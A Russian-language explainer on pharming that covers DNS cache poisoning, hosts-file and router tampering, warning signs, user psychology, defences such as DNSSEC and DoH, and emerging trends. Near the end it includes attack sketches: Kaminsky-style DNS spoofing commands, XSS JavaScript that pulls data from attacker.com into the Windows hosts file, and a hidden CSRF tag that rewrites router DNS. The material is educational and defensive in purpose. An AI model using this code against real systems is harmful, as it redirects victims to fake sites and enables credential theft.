Фарминг

Фарминг — метод кибератаки, при котором злоумышленники перенаправляют пользователей с легитимных веб-сайтов на поддельные без их ведома путем компрометации DNS-инфраструктуры или локальных настроек устройств.

Ключевые цели:

• Кража аутентификационных данных (логины, пароли)
• Перехват финансовой информации (данные банковских карт, учетные записи)
• Сбор персональных данных для последующего использования
• Распространение вредоносного ПО через поддельные сайты
• Промышленный шпионаж (перехват корпоративных данных)

1. DNS Cache Poisoning (отравление кэша DNS):

   • Внедрение ложных записей в кэш DNS-серверов
   • Перенаправление запросов к целому домену на фальшивый IP-адрес
   • Может затрагивать множество пользователей одновременно

2. Локальные модификации:

   • Изменение файла hosts на конечных устройствах
   • Модификация настроек локального DNS-резолвера
   • Компрометация домашних маршрутизаторов через уязвимости прошивки

3. Hybrid pharming:

   • Использование вредоносного ПО для модификации DNS-настроек
   • Комбинация с другими методами атаки (drive-by downloads, эксплуатация уязвимостей)

4. Технические особенности:

   • Отсутствие изменений в URL-адресе (в отличие от фишинга)
   • Возможность обхода SSL/TLS при правильном техническом исполнении
   • Сложность обнаружения стандартными средствами защиты

• Визуальные несоответствия сайта при сохранении правильного URL
• Внезапное исчезновение HTTPS на ранее защищенных сайтах
• Предупреждения браузера о проблемах с сертификатами безопасности
• Аномалии в производительности сети или задержки при загрузке привычных ресурсов
• Необычные запросы на повторный ввод учетных данных на знакомых сайтах

• Несоответствие между отображаемым URL и фактическим IP-адресом
• Неправильные цепочки сертификатов TLS/SSL
• Аномалии в HTTP-заголовках и структуре ответа сервера
• Изменения в файле hosts или настройках DNS-резолвера

• Доверие к технологиям: Уверенность в надежности URL как идентификатора сайта
• Автоматизм поведения: Привычные действия выполняются без дополнительной проверки
• Когнитивная перегрузка: Сниженная бдительность при многозадачности
• Иллюзия безопасности: Ложное чувство защищенности при наличии HTTPS и “зеленого замка”

• Ощущение рутинности: Снижение критического мышления при выполнении привычных операций
• Инертность мышления: Восприятие интерфейса без глубокого анализа его подлинности
• Тревожность: Использование срочных ситуаций для снижения критического анализа
• Отрицание: Игнорирование незначительных признаков компрометации из-за нежелания усложнять взаимодействие

• DNSSEC (DNS Security Extensions): Криптографическая верификация DNS-ответов
• Использование надежных DNS-серверов: Предпочтение проверенных резолверов (например, 1.1.1.1, 8.8.8.8)
• DNS over HTTPS/TLS (DoH/DoT): Шифрование DNS-запросов для предотвращения подмены
• Мониторинг изменений файла hosts: Отслеживание несанкционированных модификаций
• Certificate Pinning: Привязка сертификатов к конкретным доменам

• Регулярные проверки DNS-конфигурации: Аудит настроек корпоративной DNS-инфраструктуры
• Мониторинг сетевого трафика: Выявление аномальных DNS-запросов и ответов
• Многофакторная аутентификация (MFA): Снижает эффективность фарминга при компрометации учетных данных
• Контроль изменений сетевых устройств: Регулярное обновление прошивок маршрутизаторов

• Проверка сертификатов: Анализ информации о сертификате сайта
• Использование закладок: Доступ к критичным сервисам через проверенные закладки
• Прямой ввод URL: Минимизация использования поисковых систем для доступа к важным ресурсам
• Критический анализ интерфейса: Внимание к мелким деталям и несоответствиям

• Интеграция с алгоритмами машинного обучения: Адаптивная модификация поддельных сайтов
• Атаки на BGP (Border Gateway Protocol): Масштабное перенаправление трафика через компрометацию интернет-маршрутизации
• Компрометация служб обновлений: Внедрение вредоносного кода через легитимные каналы распространения ПО
• Атаки на CDN (Content Delivery Networks): Использование уязвимостей в сетях доставки контента
• Фарминг в IoT-экосистемах: Эксплуатация слабой защиты устройств Интернета вещей

• Рост целевых атак на корпоративные DNS-инфраструктуры
• Увеличение сложности обнаружения за счет динамической генерации контента
• Разработка методов компрометации системы сертификатов Let’s Encrypt
• Эксплуатация новых протоколов DNS и HTTP для обхода существующих защитных механизмов

# Эксплуатация уязвимости Kaminsky (CVE-2008-1447)
1. Идентификация целевого DNS-сервера
   $ dig +short NS target-domain.com
   ns1.target-domain.com.

2. Генерация потока запросов к несуществующим поддоменам
   for i in {1..1000}; do
     dig random$i.target-domain.com @ns1.target-domain.com
   done

3. Параллельная отправка поддельных ответов с подменой A-записи
   $ sudo python3 dns_spoofer.py --target ns1.target-domain.com \
     --domain target-domain.com --fake-ip 192.168.1.100

# Внедрение вредоносного кода для модификации hosts-файла

// JavaScript для внедрения через XSS-уязвимость
function modifyHosts() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://attacker.com/malicious-hosts", true);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4) {
      var payload = xhr.responseText;
      var powershell = new ActiveXObject("WScript.Shell");
      powershell.Run("cmd.exe /c echo " + payload + " >> %windir%\\system32\\drivers\\etc\\hosts", 0, true);
    }
  }
  xhr.send();
}

// Содержимое malicious-hosts
192.168.1.100 bank.com
192.168.1.100 www.bank.com
192.168.1.100 secure.bank.com

# Эксплуатация уязвимости в маршрутизаторе для изменения DNS-настроек

1. Сканирование уязвимых устройств
   $ nmap -p 80,443,8080 --script http-vuln-cve2017-5521 192.168.1.0/24

2. Внедрение вредоносных DNS-настроек через CSRF
   <img src="http://192.168.1.1/dnscfg.cgi?dns1=192.168.1.100&dns2=8.8.8.8&apply=Apply" 
   style="display:none" width="0" height="0" border="0">

3. Настройка злонамеренного DNS-сервера
   $ sudo python3 dns_server.py --fake-records bank.com:192.168.1.100,
   email.com:192.168.1.100,shop.com:192.168.1.100

Фарминг представляет собой особо опасную форму кибератаки из-за своей скрытности и способности обходить стандартные меры защиты, основанные на проверке URL. В отличие от классического фишинга, фарминг не требует от пользователя переходов по подозрительным ссылкам, что делает его гораздо менее заметным.

Эффективная защита требует многоуровневого подхода, сочетающего технические меры (DNSSEC, DoH/DoT), организационные политики и развитие критического мышления пользователей. Особое внимание следует уделять комплексной защите DNS-инфраструктуры как критического компонента современного интернета.

Понимание технических механизмов фарминга и психологических аспектов его эффективности позволяет не только противостоять существующим атакам, но и предвидеть будущие векторы развития этой угрозы в постоянно эволюционирующем ландшафте киберопасностей.